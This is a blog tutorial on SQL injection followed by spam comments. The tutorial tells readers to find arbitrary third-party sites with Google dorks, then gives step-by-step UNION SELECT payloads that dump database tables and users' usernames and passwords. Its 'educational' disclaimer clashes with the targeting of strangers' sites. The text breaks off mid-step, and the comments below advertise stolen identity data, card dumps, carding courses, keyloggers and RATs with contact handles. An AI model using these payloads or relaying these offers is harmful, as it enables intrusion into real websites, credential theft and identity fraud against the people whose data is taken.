Test SQL Injection Attack | Website Hacking 100% working
Warning:
This tutorial Test SQL Injection Attack | Website Hacking 100% working is for educational purposes to make you aware of test sql injection vulnerabilities that may be present in your website so that you may self test it in your owned website to improve the security. The person posting this or the this blog is not responsible for any type malicious activities performed by anyone else,,,,!!!
What is SQL Injection Attack?
So let me give you some idea of what I am going to talk about and how we can perform Website Hacking using SQL Injection Attack.
There are many complex definitions you may get in various other sites,,,
But I put it in simple terms,,,, You type some SQL queries or codes
[or whatever you wish to call it ]
on the address bar[where you type the web address of sites to be searched]
to test vulnerable website,,,,!!!
If you find it vulnerable then BINGO,,,!!!
we will use some more SQL injection queries to Website Hacking using Test SQL Injection Attack ,,,!!!
So guyzzz who are related to computer science stream,,, If you found learning SQL boring this is one way to make yourself interested in.
And as far as others are concerned,,, please don"t worry I will be giving you some codes which you may use to Test the Vulnerability of the site,,,!!!
you must also learn how to prevent sql injection attack
So....... lets begin....!!!
Test SQL Injection Attack:
QUICK STEPS:
follow the below given steps carefully where I will be demonstrating website hacking using SQL injection attack.
Step 1:
Search for any of the following terms in Google:
inurl:product.php?id=
inurl:index.php?id=
inurl:news.php?id=
inurl:shop.php?id=
inurl:shop.php?pid=
inurl:newsroom.php?id=
Step 2:
Now for example say there is a website that you found in Google search say for example
www.rahulswebsite.com/index.php?id=7
Open the website in a new tab,,,!!!
Step 3:
To test if your selected website is vulnerable:
Add the ' (single quote symbol) after the site as follows www.hackersohail.com/index.php?id=7'
and now Hit the "Enter" Key,,,!!!
If there is any type of "MySQL error" !!!BINGO,,,!!!
Then it means your target website is vulnerable.
Website Hacking using SQL Injection Attack:
Step 1:
After finding the vulnerability of your target site, use the ORDER BY command to extract the number of columns in the database.
Ex Code:
http://www.anywebsite.com/index.php?id=7 ORDER BY 1--
Doing ORDER BY 1-- should always return the original page with NO error.
Step 2:
Then do ORDER BY 2--
If this shows the original page with NO error, continue.
step3:
Now try ORDER BY 3--
and so on,
If this shows the original page with NO error, continue.
Step 4:
Continue increasing the ORDER BY number until you reach an error.
For example, if doing ORDER BY 10-- returns an error, then there is a table which has NINE (9) columns, NOT 10.
Always subtract ONE from the number that produced the error.
STEP 5:
Next step is to use UNION & SELECT
After getting the number of columns, let's say we have NINE columns. Then you have to type the following code:
Code:
http://www.anywebsite.com/index.php?id=7 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
You should see a page with a few numbers scattered throughout it. If so, continue,
IF NOT, try the following in which we have to add the " - "hypen or negative sign in front of the id value of our website:
Code:
http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
At the end if this produces the scattered numbers, continue, if not, STOP!!!
Choose another target website from the GOOGLE search and repeat the vulnerability test,,,!!!
Step 6:
Now we use the database() command
After you see the scattered numbers, pick one to exploit. Say the numbers on my page are TWO and SEVEN.
I will choose the number TWO. After choosing your number, put database() in place of it in your URL as shown below. REMEMBER, I chose number TWO.
Code:
http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,database(),3,4,5,6,7,8,9--
That should return some text in place of the scattered TWO. WRITE THIS TEXT DOWN, and move on.
Step 7:
We use group_concat
This is where everything gets a little trickier! This is also the part where you will be extracting data. Yeah! Bingoo!!! :D :D *** Fist punch ***
After extracting the name of the database using database(), type this where you typed database() in the previous step.
Code: http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--
TYPE THIS EXACTLY AS IT IS SHOWN, and press enter.
In place of the scattered TWO, you should see a LOT of text separated by commas. These are called tables. The text varies by website, but you usually want to look for things like "admin," "staff," or "users." Choose the one that interests you. For this tutorial, I will choose "users." Now type this:
Code:
http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()--
OR
if you want the columns from ONLY one table, use this (courtesy of dR..EviL):
Code:
http://www.anywebsite.com/index.php?id=-7UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name=< table name goes here in hex or ascii format >--
This should return even more text. These are called columns. Again choose what interests you, but for this tutorial, I will choose "username" and "password."
The columns "username" and "password" contain the data we want to extract. To extract the final data, meaning, in this case, the usernames and passwords of all the users, type this:
Code:
http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(username,0x3a,password,0x3a),3,4,5,6,7,8,9 from users--
Where it says "username,0x3a,password,0x3a" is where you would the name of your chosen COLUMNS, such as username and password, DO NOT replace the 0x3a, ONLY the username and password area. Where it says "from users--," replace "users" with the name of your chosen table such as the one "users." All of this will produce even MORE text in this format:
Hello all am looking few years that some guys comes into the market they called themselves hacker, carder or spammer they rip the peoples with different ways and it’s a badly impact to real hacker now situation is that peoples doesn’t believe that real hackers and carder scammer exists. Anyone want to make deal with me any type am available
Freshly spammed Fullz/Pros/Leads are available now (IN BULK) Credit Bureau Of USA spammed fullz High quality Fullz with 100% connectivity
High Credit Fullz 700+ Driving Lisence With SSN Fullz DL Fullz with Expiry Date CC Fullz with SSN Dumps with pin codes Track 101 & 202 Premium Fullz SBA/PUA/UI/Tax Return Filling Fullz
Hack-ing/Spamm-ing/Ca-rding Stuff D**p/D**k Web Complete Course with Video Tutorials SMTP's/RDP's/Shells/C-Panels Mailers/Senders/Bombers/Brutes Combos Premium Logs in Bulk Office 365 Logs BTC Cracker/Flasher FB/WA Hac-king Tricks & Tuts Ka-li Linux Master Class Complete Course Key-loggers/RAT's/Vi-ruses Scam Page Scripting SMTP Linux Root ETC
All tools & Tutorials available at your finger tips Just Take & Enjoy Proper guidance will give Complete Courses are Available too (Spamming/carding) Methods are also available Feel Free to contact guys
ReplyDeleteHello all
am looking few years that some guys comes into the market
they called themselves hacker, carder or spammer they rip the
peoples with different ways and it’s a badly impact to real hacker
now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
Anyone want to make deal with me any type am available
Available Services
..Wire Bank Transfer all over the world
..Western Union Transfer all over the world
..Credit Cards (USA, UK, AUS, CAN, NZ)
..School Grade upgrade / remove Records
..Spamming Tool
..keyloggers / rats
..Social Media recovery
.. Teaching Hacking / spamming / carding (1/2 hours course)
discount for re-seller
Contact: 24/7
fixitrogers@gmail.com
Good Day To All
ReplyDeleteFreshly spammed Fullz/Pros/Leads are available now (IN BULK)
Credit Bureau Of USA spammed fullz
High quality Fullz with 100% connectivity
High Credit Fullz 700+
Driving Lisence With SSN Fullz
DL Fullz with Expiry Date
CC Fullz with SSN
Dumps with pin codes Track 101 & 202
Premium Fullz
SBA/PUA/UI/Tax Return Filling Fullz
@leadsupplier Tele.Gram
peeterhacks Wickr/Skype
75.282.20.40 I:C:Q
Tutorials Available with Tools & Ebooks
Hack-ing/Spamm-ing/Ca-rding Stuff
D**p/D**k Web Complete Course with Video Tutorials
SMTP's/RDP's/Shells/C-Panels
Mailers/Senders/Bombers/Brutes
Combos
Premium Logs in Bulk
Office 365 Logs
BTC Cracker/Flasher
FB/WA Hac-king Tricks & Tuts
Ka-li Linux Master Class Complete Course
Key-loggers/RAT's/Vi-ruses
Scam Page Scripting
SMTP Linux Root
ETC
All tools & Tutorials available at your finger tips
Just Take & Enjoy
Proper guidance will give
Complete Courses are Available too (Spamming/carding)
Methods are also available
Feel Free to contact guys
@killhacks Tele.gram
75.282.20.40 I;C;Q